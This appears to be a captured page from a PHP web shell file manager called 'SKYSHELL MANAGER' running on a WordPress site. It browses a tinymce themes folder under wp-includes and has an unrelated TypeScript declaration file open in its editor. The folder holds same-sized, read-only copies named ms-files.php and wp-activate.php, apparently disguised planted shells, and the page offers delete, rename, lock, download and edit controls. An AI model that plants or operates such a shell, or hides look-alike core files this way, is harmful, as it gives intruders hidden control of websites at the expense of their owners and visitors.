📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: callBound.d.ts
import type { Intrinsics } from '../GetIntrinsic'; type PrependThisParameter<T> = T extends (...args: infer A) => infer R ? (thisArg: ThisParameterType<T>, ...args: A) => R : T; declare function callBoundIntrinsic<K extends keyof Intrinsics>( name: K, allowMissing?: false, ): PrependThisParameter<Intrinsics[K]>; declare function callBoundIntrinsic<K extends keyof Intrinsics>( name: K, allowMissing: true, ): PrependThisParameter<Intrinsics[K]> | undefined; declare function callBoundIntrinsic<K extends keyof Intrinsics>( name: K, allowMissing?: boolean, ): PrependThisParameter<Intrinsics[K]> | undefined; declare function callBoundIntrinsic(name: string, allowMissing?: boolean): any; export = callBoundIntrinsic;
Save